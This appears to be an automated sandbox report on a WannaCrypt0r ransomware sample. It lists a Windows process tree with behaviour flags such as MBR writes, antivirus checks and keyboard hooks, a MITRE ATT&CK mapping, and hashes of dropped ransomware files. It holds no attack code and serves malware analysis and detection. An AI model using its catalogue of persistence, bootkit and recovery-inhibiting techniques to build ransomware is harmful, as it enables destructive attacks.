                                                                                                                                                                                                                                                                                                                                                                                                  • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: LoadsDriver
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1972
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:916
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1260 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1660
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5056 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4104
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7952 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:800
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4392
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://click.kaspersky.com/?hl=en&customization=&version=21.3.10.391&pid=PURE&syst=Microsoft Windows 10 x64 Edition (build 19041)&error=29100&link=AntiMalwareTools
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5500
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe01c46f8,0x7fffe01c4708,0x7fffe01c4718
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3592
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5040 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2088
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:5388
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5188
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4048 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3564
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5312
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1004 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4264
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3116 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5140
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5452 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3460
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1316
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5580
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1740
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\104.289.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\104.289.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=VqLc1a4EqWYzq5fg/g94Sg+KvYx+U95LR/AZRX24 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5628
                                                                                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.289.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.289.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=104.289.200 --initial-client-data=0x290,0x294,0x298,0x26c,0x29c,0x7ff65dc12d20,0x7ff65dc12d30,0x7ff65dc12d40
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2388
                                                                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.289.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.289.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_5628_YAJCCDUGAHQLZLVK" --sandboxed-process-id=2 --init-done-notifier=776 --sandbox-mojo-pipe-token=12075956119949869821 --mojo-platform-channel-handle=752 --engine=2
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3080
                                                                                                                                                                                                                                                                                                                                                                                                                                      • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.289.200\software_reporter_tool.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.289.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_5628_YAJCCDUGAHQLZLVK" --sandboxed-process-id=3 --init-done-notifier=1000 --sandbox-mojo-pipe-token=12115237582678791437 --mojo-platform-channel-handle=996
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3660
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:824
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2684
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1700
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding FDFE8AED89EB01F8E94AC06737768972
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3036
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 792465674DA669236A19F045BC727B2C E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4496
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\MsiExec.exe -Embedding AC8860796D6E00BEAF762B1004F098D5 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:316
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3812

                                                                                                                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                          Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                          Bootkit

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1067

                                                                                                                                                                                                                                                                                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1158

                                                                                                                                                                                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                          File Deletion

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1107

                                                                                                                                                                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                          File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1158

                                                                                                                                                                                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                          Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1063

                                                                                                                                                                                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                          Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                          Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                          Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                          Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1490

                                                                                                                                                                                                                                                                                                                                                                                                                                          Defacement

                                                                                                                                                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                                                                                                                                                          T1491

                                                                                                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6048_1261917545\ChromeRecovery.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                            253KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                            49ac3c96d270702a27b4895e4ce1f42a

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                            55b90405f1e1b72143c64113e8bc65608dd3fd76

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                            82aa3fd6a25cda9e16689cfadea175091be010cecae537e517f392e0bef5ba0f

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                            b62f6501cb4c992d42d9097e356805c88ac4ac5a46ead4a8eee9f8cbae197b2305da8aab5b4a61891fe73951588025f2d642c32524b360687993f98c913138a0

                                                                                                                                                                                                                                                                                                                                                                                                                                            Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141\Recovery.crx3
                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                            141KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                            ea1c1ffd3ea54d1fb117bfdbb3569c60

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                            10958b0f690ae8f5240e1528b1ccffff28a33272

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                            7c3a6a7d16ac44c3200f572a764bce7d8fa84b9572dd028b15c59bdccbc0a77d

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                            6c30728cac9eac53f0b27b7dbe2222da83225c3b63617d6b271a6cfedf18e8f0a8dffa1053e1cbc4c5e16625f4bbc0d03aa306a946c9d72faa4ceb779f8ffcaf

                                                                                                                                                                                                                                                                                                                                                                                                                                            Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                            d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                                                                                                                                                            Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\b.wnry
                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                            c17170262312f3be7027bc2ca825bf0c

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                            f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                            d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                            c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                                                                                                                                                                                                                                                                                                                                            Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\c.wnry
                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                            780B

                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                            8124a611153cd3aceb85a7ac58eaa25d

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                            c1d5cd8774261d810dca9b6a8e478d01cd4995d6

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                            0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                            b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

                                                                                                                                                                                                                                                                                                                                                                                                                                            Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_bulgarian.wnry
                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                            46KB

                                                                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                            95673b0f968c0f55b32204361940d184

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                            81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                            40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                            7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                                                                                                                                                                                                                                                                                                                                                            Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_chinese (simplified).wnry
                                                                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                            53KB

